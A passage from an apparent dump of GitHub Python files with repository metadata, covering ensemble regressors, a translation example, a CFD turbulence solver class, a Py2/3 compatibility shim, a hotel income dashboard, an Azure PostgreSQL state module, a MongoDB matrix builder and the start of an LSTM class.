self.base_models_ ])\n return self.meta_model_.predict(meta_features)\n\n\nclass StackingRetrainedRegressor(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_models, n_folds = 5, use_feat_secondary = False):\n self.base_models = base_models\n self.meta_models = meta_models\n self.n_folds = n_folds\n self.use_feat_secondary = use_feat_secondary\n \n def fit(self, X, y):\n self.base_models_ = [clone(x) for x in self.base_models]\n self.meta_models_ = clone(self.meta_models)\n kfold = KFold(n_splits = self.n_folds, shuffle = True)\n \n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n \n for i, model in enumerate(self.base_models_):\n for train_idx, holdout_idx in kfold.split(X, y):\n instance = clone(model)\n instance.fit(X[train_idx], y[train_idx])\n out_of_fold_predictions[holdout_idx, i] = instance.predict(X[holdout_idx])\n \n # train meta-model\n if self.use_feat_secondary:\n self.meta_models_.fit(np.hstack((X, out_of_fold_predictions)), y)\n else:\n self.meta_models_.fit(out_of_fold_predictions, y)\n \n # retrain base models on all data\n for regr in self.base_models_:\n regr.fit(X, y)\n \n return self\n \n def predict(self, X):\n meta_features = np.column_stack([ regr.predict(X) for regr in self.base_models_])\n if self.use_feat_secondary:\n return self.meta_models_.predict(np.hstack((X, meta_features)))\n else:\n return self.meta_models_.predict(meta_features)\n \n\n \n ","repo_name":"hwahyu/Machine-Learning","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16654743214","text":"'''\npip install googletrans==4.0.0-rc1\n'''\nimport googletrans\n\ntranslator = googletrans.Translator()\n\nstr1 = \"행복하세요\"\nresult1 = translator.translate( str1, dest='en', src='auto' ) #src='auto'는 기본값이라 생략가능\nprint(f'행복하세요 => { result1.text }')\n\nstr2 = \"I am happy\"\nresult2 = translator.translate( str2, dest='ko', src='en' )\nprint(f'I am happy => { result2.text }')","repo_name":"grey920/book_40_examples_with_python","sub_path":"9.영어로된 문서를 한글로 자동번역/main9-1.py","file_name":"main9-1.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71914198213","text":"from abc import abstractmethod\n\n# import kratos\nimport KratosMultiphysics as Kratos\nimport KratosMultiphysics.FluidDynamicsApplication as KratosCFD\n\n# import formulation interface\nfrom KratosMultiphysics.RANSApplication.formulations.rans_formulation import RansFormulation\n\n# import utilities\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CreateRansFormulationModelPart\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CreateBlockBuilderAndSolver\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import InitializePeriodicConditions\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import GetBoundaryFlags\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import GetKratosObjectPrototype\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CalculateNormalsOnConditions\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import InitializeYPlusVariablesInConditions\n\nclass ScalarTurbulenceModelRansFormulation(RansFormulation):\n def __init__(self, model_part, settings):\n \"\"\"Scalar turbulence model formulation base class\n\n This solves the variable given in self.GetSolvingVariable(), using element and conditions\n having prefixes provided by self.GetElementNamePrefix() and self.GetConditionNamePrefix()\n\n If wall functions are used, then self.GetConditionNamePrefix() should return non-empty prefix\n otherwise it should be empty.\n\n Args:\n model_part (Kratos.ModelPart): ModelPart to be used in the formulation.\n settings (Kratos.Parameters): Settings to be used in the formulation.\n \"\"\"\n defaults = Kratos.Parameters(r\"\"\"{\n \"relative_tolerance\" : 1e-3,\n \"absolute_tolerance\" : 1e-5,\n \"max_iterations\" : 200,\n \"relaxation_factor\" : 0.5,\n \"echo_level\" : 2,\n \"linear_solver_settings\": {\n \"solver_type\" : \"amgcl\"\n },\n \"boundary_flags\": [\"INLET\", \"STRUCTURE\"]\n }\"\"\")\n\n settings.ValidateAndAssignDefaults(defaults)\n self.echo_level = settings[\"echo_level\"].GetInt()\n\n super().__init__(model_part, settings)\n\n @abstractmethod\n def GetSolvingVariable(self):\n pass\n\n @abstractmethod\n def GetElementNamePrefix(self):\n pass\n\n @abstractmethod\n def GetConditionNamePrefix(self):\n pass\n\n def PrepareModelPart(self):\n self.turbulence_model_part = CreateRansFormulationModelPart(\n self.GetComputingModelPart(),\n self.__class__.__name__,\n self.GetDomainSize(),\n self.element_name,\n self.condition_name)\n\n Kratos.Logger.PrintInfo(self.__class__.__name__,\n \"Created formulation model part.\")\n\n def Initialize(self):\n InitializeYPlusVariablesInConditions(self.GetBaseModelPart())\n CalculateNormalsOnConditions(self.GetBaseModelPart())\n\n settings = self.GetParameters()\n\n if (self.IsPeriodic()):\n InitializePeriodicConditions(\n self.GetBaseModelPart(),\n self.GetModelPart(),\n [self.GetSolvingVariable()])\n\n linear_solver_factory = GetKratosObjectPrototype(\"LinearSolverFactory\")\n linear_solver = linear_solver_factory(settings[\"linear_solver_settings\"])\n\n builder_and_solver = CreateBlockBuilderAndSolver(\n linear_solver,\n self.IsPeriodic(),\n self.GetCommunicator())\n\n convergence_criteria_type = GetKratosObjectPrototype(\"MixedGenericCriteria\")\n convergence_criteria = convergence_criteria_type([\n (self.GetSolvingVariable(),\n settings[\"relative_tolerance\"].GetDouble(),\n settings[\"absolute_tolerance\"].GetDouble())])\n\n if (self.is_steady_simulation):\n scheme = self.scheme_type(settings[\"relaxation_factor\"].GetDouble())\n else:\n scheme_type = GetKratosObjectPrototype(\"BossakRelaxationScalarScheme\")\n scheme = scheme_type(\n self.GetModelPart().ProcessInfo[Kratos.BOSSAK_ALPHA],\n settings[\"relaxation_factor\"].GetDouble(),\n self.GetSolvingVariable())\n\n solver_type = GetKratosObjectPrototype(\"ResidualBasedNewtonRaphsonStrategy\")\n self.solver = solver_type(\n self.GetModelPart(),\n scheme,\n convergence_criteria,\n builder_and_solver,\n settings[\"max_iterations\"].GetInt(),\n False,\n False,\n False)\n\n self.solver.SetEchoLevel(self.echo_level)\n convergence_criteria.SetEchoLevel(self.echo_level)\n\n super().Initialize()\n Kratos.Logger.PrintInfo(self.__class__.__name__, \"Initialized formulation\")\n\n def SolveCouplingStep(self):\n if (self.IsBufferInitialized()):\n self.ExecuteBeforeCouplingSolveStep()\n self.solver.Predict()\n self.solver.SolveSolutionStep()\n self.ExecuteAfterCouplingSolveStep()\n Kratos.Logger.PrintInfo(self.__class__.__name__, \"Solved formulation.\")\n return True\n\n return False\n\n def GetStrategy(self):\n return self.solver\n\n def SetTimeSchemeSettings(self, settings):\n if (settings.Has(\"scheme_type\")):\n scheme_type = settings[\"scheme_type\"].GetString()\n if (scheme_type == \"steady\"):\n self.is_steady_simulation = True\n elif (scheme_type == \"bdf2\" or scheme_type == \"bossak\"):\n self.is_steady_simulation = False\n else:\n raise Exception(\n \"Only \\\"steady\\\", \\\"bdf2\\\" and \\\"bossak\\\" scheme types supported. [ scheme_type = \\\"\"\n + scheme_type + \"\\\" ]\")\n else:\n raise Exception(\n \"\\\"scheme_type\\\" is missing in time scheme settings\")\n\n def GetMaxCouplingIterations(self):\n return 0\n\n def GetModelPart(self):\n return self.turbulence_model_part\n\n def SetStabilizationMethod(self, stabilization_method):\n self.element_name = self.GetElementNamePrefix()\n if (stabilization_method == \"algebraic_flux_corrected\"):\n self.element_name = self.element_name + \"AFC\"\n self.scheme_type = self._CreateAlgebraicFluxCorrectedSteadyScalarScheme\n elif (stabilization_method == \"residual_based_flux_corrected\"):\n self.element_name = self.element_name + \"RFC\"\n self.scheme_type = GetKratosObjectPrototype(\"SteadyScalarScheme\")\n elif (stabilization_method == \"non_linear_cross_wind_dissipation\"):\n self.element_name = self.element_name + \"CWD\"\n self.scheme_type = GetKratosObjectPrototype(\"SteadyScalarScheme\")\n else:\n raise Exception(\"Unsupported stabilization method\")\n\n def SetWallFunctionSettings(self, settings):\n self.condition_name = self.GetConditionNamePrefix()\n\n if (self.condition_name != \"\"):\n if (settings.Has(\"wall_function_region_type\")):\n wall_function_region_type = settings[\"wall_function_region_type\"].GetString()\n else:\n wall_function_region_type = \"logarithmic_region_only\"\n\n if (settings.Has(\"wall_friction_velocity_calculation_method\")):\n wall_friction_velocity_calculation_method = settings[\"wall_friction_velocity_calculation_method\"].GetString()\n else:\n wall_friction_velocity_calculation_method = \"velocity_based\"\n\n if (wall_function_region_type == \"logarithmic_region_only\"):\n if (wall_friction_velocity_calculation_method == \"velocity_based\"):\n self.condition_name = self.condition_name + \"UBasedWall\"\n elif (wall_friction_velocity_calculation_method ==\n \"turbulent_kinetic_energy_based\"):\n self.condition_name = self.condition_name + \"KBasedWall\"\n else:\n msg = \"Unsupported wall friction velocity calculation method. [ wall_friction_velocity_calculation_method = \\\"\" + wall_friction_velocity_calculation_method + \"\\\" ].\\n\"\n msg += \"Supported methods are:\\n\"\n msg += \"\\tvelocity_based\\n\"\n msg += \"\\tturbulent_kinetic_energy_based\\n\"\n raise Exception(msg)\n else:\n msg = \"Unsupported wall function region type provided. [ wall_function_region_type = \\\"\" + wall_function_region_type + \"\\\" ].\"\n msg += \"Supported wall function region types are:\\n\"\n msg += \"\\tlogarithmic_region_only\\n\"\n raise Exception(msg)\n\n def _CreateAlgebraicFluxCorrectedSteadyScalarScheme(self, relaxation_factor):\n if (self.IsPeriodic()):\n return GetKratosObjectPrototype(\"AlgebraicFluxCorrectedSteadyScalarScheme\")(relaxation_factor, GetBoundaryFlags(self.GetParameters()[\"boundary_flags\"]), KratosCFD.PATCH_INDEX)\n else:\n return GetKratosObjectPrototype(\"AlgebraicFluxCorrectedSteadyScalarScheme\")(relaxation_factor, GetBoundaryFlags(self.GetParameters()[\"boundary_flags\"]))","repo_name":"KratosMultiphysics/Kratos","sub_path":"applications/RANSApplication/python_scripts/formulations/turbulence_models/scalar_turbulence_model_rans_formulation.py","file_name":"scalar_turbulence_model_rans_formulation.py","file_ext":"py","file_size_in_byte":9289,"program_lang":"python","lang":"en","doc_type":"code","stars":906,"dataset":"github-code","pt":"44"} +{"seq_id":"72734569734","text":"'''a small Python 2 and 3 compatibility library'''\n\nimport os\nimport sys\n# get version\npy3 = (sys.version_info[0] >= 3)\npy2 = (not py3)\n\n# Note: avoid using 'x' mode when in py2 & pypy3\n# open\ntry: # py3 only\n FileExistsError\n FileNotFoundError\nexcept NameError: # py2/pypy3\n pypy3 = py3\n\n class FileExistsError(OSError):\n pass\n\n class FileNotFoundError(IOError):\n pass\n\nelse:\n pypy3 = False\n FileExistsError = FileExistsError # for import\n FileNotFoundError = FileNotFoundError # for import\n\nif py2:\n import codecs\n import warnings\n\n def open(file, mode='r', buffering=-1, encoding=None,\n errors=None, newline=None, closefd=True, opener=None):\n\n if newline is not None:\n warnings.warn('newline is not supported in py2')\n if not closefd:\n warnings.warn('closefd is not supported in py2')\n if opener is not None:\n warnings.warn('opener is not supported in py2')\n\n if 'x' in mode and os.path.exists(file):\n raise FileExistError(\"[Errno 17] File exists: '%s'\" % file)\n elif 'r' in mode and not os.path.exists(file):\n raise FileNotFoundError(\n \"[Errno 2] No such file or directory: '%s'\" % file)\n\n return codecs.open(filename=file, mode=mode, encoding=encoding,\n errors=errors, buffering=buffering)\nelif pypy3:\n\n def open(file, mode='r', *a, **k):\n if 'x' in mode:\n if os.path.exists(file):\n raise FileExistError(\"[Errno 17] File exists: '%s'\" % file)\n mode = mode.replace('x', 'w') # pypy3 does not support 'x'\n elif 'r' in mode:\n if not os.path.exists(file):\n raise FileNotFoundError(\n \"[Errno 2] No such file or directory: '%s'\" % file)\n\n return __builtins__.open(file, mode, *a, **k)\n\nelse:\n open = open # for import\n","repo_name":"TylerTemp/qstart","sub_path":"lib/tool/minsix.py","file_name":"minsix.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4704805572","text":"#!/usr/bin/env python3\n# Tableau de pascal\n\ndef p1(l1: list):\n l2 = [1]\n n = len(l1)\n for k in range(1, n):\n l2.append(l1[k] + l1[k - 1])\n l2.append(1)\n return l2\n\n\ndef p2(n: int):\n l = [1]\n for i in range(n):\n print(p1(l))\n l = p1(l)\n\np2(10)\n","repo_name":"bc1bb/pieces-of-code","sub_path":"lycee/python/pascal.py","file_name":"pascal.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"35544324022","text":"from pathlib import Path\n\nfrom tkinter import Frame, Canvas, Entry, Text, Button, PhotoImage, messagebox, Tk, ttk\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom controller import *\n\nOUTPUT_PATH = Path(__file__).parent\nASSETS_PATH = OUTPUT_PATH / Path(\"./assets\")\n\n\ndef relative_to_assets(path: str) -> Path:\n return ASSETS_PATH / Path(path)\n\n\ndef about():\n About()\n\n\nclass About(Frame):\n def __init__(self, parent, controller=None, *args, **kwargs):\n Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n\n self.configure(bg=\"#FFFFFF\")\n\n notebook = ttk.Notebook(self)\n tab1 = self.create_tab(notebook, \"Income\")\n tab2 = self.create_tab_2(notebook, \"Check In/Out\")\n tab3 = self.create_tab_3(notebook, \"Room Type Income\")\n tab4 = self.create_tab_4(notebook, \"Service Type Income\")\n\n # Add the tabs to the Notebook\n notebook.add(tab1, text=\"Income\")\n notebook.add(tab2, text=\"Check In/Out\")\n notebook.add(tab3, text=\"Room Type Income\")\n notebook.add(tab4, text=\"Service Type Income\")\n\n # Pack the Notebook widget\n notebook.pack()\n\n\n def create_tab(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, total_bills = get_bill_value_group_by_month()\n\n # Create the bar chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.bar(\n months,\n total_bills,\n color=\"#5E95FF\",\n width=0.5,\n edgecolor=\"#5E95FF\",\n linewidth=1,\n )\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Bill Value')\n ax.set_title('Time Series Bar Chart of Total Bill Value')\n ax.set_xticklabels(months, rotation=45)\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_2(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, total_check_ins, total_check_outs = get_total_check_in_check_out_group_by_month()\n # Create the multi-line chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.plot(months, total_check_ins, color=\"#5E95FF\", linewidth=1, label=\"Check In\")\n ax.plot(months, total_check_outs, color=\"#FFA500\", linewidth=1, label=\"Check Out\")\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Check In/Out')\n ax.set_title('Time Series Line Chart of Total Check In/Out')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_3(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, deluxe_bills, normal_bills = get_total_bill_value_each_room_type_group_by_month()\n # create mullti-bar chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.bar(\n months,\n deluxe_bills,\n color=\"#5E95FF\",\n width=0.5,\n edgecolor=\"#5E95FF\",\n linewidth=1,\n label=\"Deluxe\",\n )\n ax.bar(\n months,\n normal_bills,\n color=\"#FFA500\",\n width=0.5,\n edgecolor=\"#FFA500\",\n linewidth=1,\n label=\"Normal\",\n )\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Bill Value')\n ax.set_title('Time Series Bar Chart of Total Bill Value Each Room Type')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_4(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, service_values = get_total_service_value_each_type_group_by_month()\n # create stacked area chart\n fig, ax = plt.subplots(figsize=(7, 4))\n service_names = list(service_values.keys())\n list_of_values = list(service_values.values())\n ax.stackplot(months, *list_of_values, labels=service_names)\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Service Value')\n ax.set_title('Time Series Stacked Area Chart of Total Service Value Each Type')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame","repo_name":"nukima/hotel_management","sub_path":"gui/main_window/about/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15298082235","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAzure Resource Manager (ARM) PostgreSQL Server Configuration Operations State Module\n\n.. versionadded:: 2.0.0\n\n.. versionchanged:: 4.0.0\n\n:maintainer: <devops@eitr.tech>\n:configuration: This module requires Azure Resource Manager credentials to be passed via acct. Note that the\n authentication parameters are case sensitive.\n\n Required provider parameters:\n\n if using username and password:\n * ``subscription_id``\n * ``username``\n * ``password``\n\n if using a service principal:\n * ``subscription_id``\n * ``tenant``\n * ``client_id``\n * ``secret``\n\n Optional provider parameters:\n\n **cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.\n Possible values:\n * ``AZURE_PUBLIC_CLOUD`` (default)\n * ``AZURE_CHINA_CLOUD``\n * ``AZURE_US_GOV_CLOUD``\n * ``AZURE_GERMAN_CLOUD``\n\n Example acct setup for Azure Resource Manager authentication:\n\n .. code-block:: yaml\n\n azurerm:\n default:\n subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617\n tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF\n client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF\n secret: XXXXXXXXXXXXXXXXXXXXXXXX\n cloud_environment: AZURE_PUBLIC_CLOUD\n user_pass_auth:\n subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617\n username: fletch\n password: 123pass\n\n The authentication parameters can also be passed as a dictionary of keyword arguments to the ``connection_auth``\n parameter of each state, but this is not preferred and could be deprecated in the future.\n\n\"\"\"\n# Python libs\nfrom __future__ import absolute_import\nimport logging\n\nlog = logging.getLogger(__name__)\n\nTREQ = {\n \"present\": {\n \"require\": [\n \"states.azurerm.resource.group.present\",\n \"states.azurerm.postgresql.server.present\",\n ]\n }\n}\n\n\nasync def present(\n hub, ctx, name, server_name, resource_group, value, connection_auth=None, **kwargs,\n):\n \"\"\"\n .. versionadded:: 2.0.0\n\n .. versionchanged:: 4.0.0\n\n Ensures that a specific configuration setting exists with the given value for a specific PostgreSQL server. A list\n of configuration settings that can be updated for the given server can be found by using the list_by_server\n operation below. Additionally, all possible values for each individual configuration setting can be found\n using that module.\n\n :param name: The name of the server configuration setting.\n\n :param server_name: The name of the server.\n\n :param resource_group: The name of the resource group. The name is case insensitive.\n\n :param value: The value of the configuration setting.\n\n :param connection_auth: A dict with subscription and authentication parameters to be used in connecting to the\n Azure Resource Manager API.\n\n Example usage:\n\n .. code-block:: yaml\n\n Ensure configuration setting exists:\n azurerm.postgresql.configuration.present:\n - name: my_rule\n - server_name: my_server\n - resource_group: my_rg\n - value: config_value\n\n \"\"\"\n ret = {\"name\": name, \"result\": False, \"comment\": \"\", \"changes\": {}}\n action = \"create\"\n\n if not isinstance(connection_auth, dict):\n if ctx[\"acct\"]:\n connection_auth = ctx[\"acct\"]\n else:\n ret[\n \"comment\"\n ] = \"Connection information must be specified via acct or connection_auth dictionary!\"\n return ret\n\n config = await hub.exec.azurerm.postgresql.configuration.get(\n ctx=ctx,\n name=name,\n server_name=server_name,\n resource_group=resource_group,\n azurerm_log_level=\"info\",\n **connection_auth,\n )\n\n if \"error\" not in config:\n action = \"update\"\n if value:\n if value != config.get(\"value\"):\n ret[\"changes\"][\"value\"] = {\"old\": config.get(\"value\"), \"new\": value}\n\n if not ret[\"changes\"]:\n ret[\"result\"] = True\n ret[\"comment\"] = \"Configuration Setting {0} is already present.\".format(\n name\n )\n return ret\n\n if ctx[\"test\"]:\n ret[\"result\"] = None\n ret[\"comment\"] = \"Configuration Setting {0} would be updated.\".format(name)\n return ret\n\n if ctx[\"test\"]:\n ret[\"comment\"] = \"Configuration Setting {0} would be created.\".format(name)\n ret[\"result\"] = None\n return ret\n\n config_kwargs = kwargs.copy()\n config_kwargs.update(connection_auth)\n\n config = await hub.exec.azurerm.postgresql.configuration.create_or_update(\n ctx=ctx,\n name=name,\n server_name=server_name,\n resource_group=resource_group,\n value=value,\n **config_kwargs,\n )\n\n if action == \"create\":\n ret[\"changes\"] = {\"old\": {}, \"new\": config}\n\n if \"error\" not in config:\n ret[\"result\"] = True\n ret[\"comment\"] = f\"Configuration Setting {name} has been {action}d.\"\n return ret\n\n ret[\"comment\"] = \"Failed to {0} Configuration Setting {1}! ({2})\".format(\n action, name, config.get(\"error\")\n )\n if not ret[\"result\"]:\n ret[\"changes\"] = {}\n return ret\n","repo_name":"eitrtechnologies/idem-azurerm","sub_path":"idem_azurerm/states/azurerm/postgresql/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"15786672315","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Author: Eric Nichols, <eric@ecei.tohoku.ac.jp>\n################################################################################\n\n'''\n`instances2matrix.py`: creates a matrix of co-occurence counts between\nrelation pattern * arguments in mongodb from input instances\n\n### Usage\n\n\tUsage: instances2matrix.py [options] [database] [collection] [<instance_files>]\n\n\tOptions:\n \t-h, --help show this help message and exit\n \t-c COLLECTION, --collection=COLLECTION \n \t\t collection name\n \t-d DB, --database=DB database name\n \t-o HOST, --host=HOST mongodb host machine name. \n \t\t\t default: localhost\n \t-p PORT, --port=PORT mongodb host machine port number. \n \t\t\t default: 27017\n\n### Instances\n\n#### Format\n\nInstances have the following tab-delimited format:\n\n* `score`: score representing weight * co-occurence count for instance\n* `loc`: giving source and location of instance\n* `rel`: containing relation pattern\n* `argc`: giving argument count\n* `argv`: tab-delimited list of arguments as strings\n\n#### Example\n\n 1.0\\treverb_clueweb_tuples-1.1.txt:30:10-11\\tARG1 acquired ARG2\\t2\\Google\\tYouTube\n \n### Co-occurence Matrix\n\n#### Format\n \nThe co-occurence matrix collection has the following fields:\n \n* `rel`: relation pattern\n* `arg1`: first argument\n* ...\n* `argn`: nth argument\n* `score`: score for rel * args tuple\n\n#### Naming Scheme\n\nInstances of differing argument count are stored in separate mongodb\ncollections with names formatted as `<collection>_<argc>`. E.g. if a\ncollection `clueweb` has instances with argument counts of 1, 2, and\n3, then the following collection would be created:\n \n* `clueweb_1`\n* `clueweb_2`\n* `clueweb_3`\n \n#### Indexing\n\nIt is indexed for fast look up of rel, args, and (rel,args) tuples.\n'''\n\nimport fileinput\nimport functools\nimport pymongo\nimport re\nimport sys\nfrom collections import namedtuple\n\nimport mongodb\n\nInstance = namedtuple('Instance', ['score', 'loc', 'rel', 'argc', 'argv'])\n\ndef str2instance(s):\n '''converts tab-delimited string into Instance'''\n ss = s.strip().split('\\t')\n score, loc, rel, argc = ss[:4]\n argv = ss[4:]\n score = float(score)\n argc = int(argc)\n assert len(argv) == argc\n return Instance(score, loc, rel, argc, argv)\n\ndef instance2doc(i):\n '''converts Instance into mongodb document (i.e. dictionary), enumerating all \n args in argv'''\n doc = {'arg%d'%n:v\n for n,v in enumerate(i.argv, 1)}\n doc['score'] = i.score\n doc['rel'] = i.rel\n return doc\n\ndef collection2argc(c):\n '''splits collection name into baseform and argc'''\n return int(c.split('_')[-1])\n\ndef is_matrix_collection(matrix, collection):\n '''returns true if collection name has the form <matrix>_<digit>'''\n return re.match('^%s_[0-9]+$' % matrix, collection)\n\ndef get_matrix_collections(db, matrix):\n '''returns a list of all collections with a name of the form <matrix>_<digit>'''\n return [c\n for c in db.collection_names()\n if is_matrix_collection(matrix, c)]\n\ndef ensure_indices(db, coll):\n x = db[coll].find_one()\n n = len( [k \n for k in x.keys()\n if k.startswith('arg')] )\n # index for <REL,ARG1,...ARGN>\n db[coll].ensure_index(\n [('rel', pymongo.ASCENDING), ] + \\\n [('arg%d'%i, pymongo.ASCENDING)\n for i in xrange(1, n+1)]\n )\n for i in xrange(1, n+1):\n # index for <ARGJ,...,ARGN>\n db[coll].ensure_index(\n [('arg%d'%j, pymongo.ASCENDING)\n for j in xrange(i, n+1)]\n )\n\ndef ensure_matrix_indices(db, matrix):\n '''ensures indices exist on collection for <REL,ARG1,...ARGN> and \n <ARG1,...,ARGN>, <ARG2,...,ARGN>, ..., <ARGN>'''\n print >>sys.stderr, 'ensuring indices for %s ...' % matrix\n for c in get_matrix_collections(db, matrix):\n ensure_indices(db, c)\n print >>sys.stderr, 'ensuring indices for %s: done.' % matrix\n\ndef collection_argc(c, argc):\n '''returns collection name appended with _argc'''\n return '%s_%d' % (c, argc)\n\ndef create_collection(db, collection, data):\n '''creates collection containing instances from input files'''\n for a in data:\n i = str2instance(a)\n #print >>sys.stderr, i\n d = instance2doc(i)\n c = collection_argc(collection, i.argc)\n print >>sys.stderr, db[c], i\n db[c].save(d, j=True)\n # ensure indices exist\n ensure_matrix_indices(db, collection)\n\ndef reset_matrix(db, matrix):\n for c in get_matrix_collections(db, matrix):\n fullname = mongodb.fullname(db[c])\n print >>sys.stderr, 'resetting %s ...' % fullname\n db.drop_collection(c)\n print >>sys.stderr, 'resetting %s: done' % fullname\n\nif __name__ == '__main__':\n from optparse import OptionParser\n usage = '''%prog [options] [<instance_file>]'''\n parser = OptionParser(usage=usage)\n parser.add_option('-o', '--host', dest='host', default='localhost',\n help='''mongodb host machine name. default: localhost''') \n parser.add_option('-p', '--port', dest='port', type=int, default=1979,\n help='''mongodb host machine port number. default: 27017''')\n parser.add_option('-r', '--reset',\n action='store_true', dest='reset', default=False,\n help='''reset matrix collections. default: False''')\n options, args = parser.parse_args()\n if len(args) < 2:\n parser.print_help()\n exit(1)\n\n db_, matrix = args[:2]\n files = args[2:]\n connection = pymongo.MongoClient(options.host, options.port)\n db = connection[db_]\n\n if options.reset: reset_matrix(db, matrix)\n\n data = (i.strip() for i in fileinput.input(files))\n create_collection(db, matrix, data)\n","repo_name":"underspecified/web-ka","sub_path":"tools/instances2matrix.py","file_name":"instances2matrix.py","file_ext":"py","file_size_in_byte":5828,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"72418218372","text":"import numpy as np\n\nclass tanh:\n def __init__(self):\n self.params, self.grads = [], []\n self.output = None\n \n def forward(self, x):\n numerator = np.exp(x) - np.exp(-x)\n denominator = np.exp(x) + np.exp(-x)\n self.output = numerator / denominator\n return self.output\n\n def backward(self, dout):\n dout = dout * (1 - np.square(self.output))\n return dout\n\nclass Sigmoid:\n def __init__(self):\n self.params, self.grads = [], []\n self.out = None\n\n def forward(self, x):\n self.out = 1 / (1 + np.exp(-x))\n return 1 / (1 + np.exp(-x))\n \n def backward(self, dout):\n return dout * self.out * (1 - self.out)\n\nclass LSTM:\n def __init__(self, Wh, Wx, b):\n self.grads = []\n self.hidden_size = Wh.shape[0]\n self.W_h = Wh.copy()\n self.W_x = Wx.copy()\n self.b = b.copy()\n self.params = [self.W_x, self.W_h, self.b]\n self.c_t = None\n self.h_t = None\n self.A = None\n self.forget_sigmoid = Sigmoid()\n self.new_info_tanh = tanh()\n self.information_sigmoid = Sigmoid()\n self.output_sigmoid = Sigmoid()\n self.cell_tanh = tanh()\n self.forget_gate = None\n self.new_info = None\n self.info_gate = None\n self.output_gate = 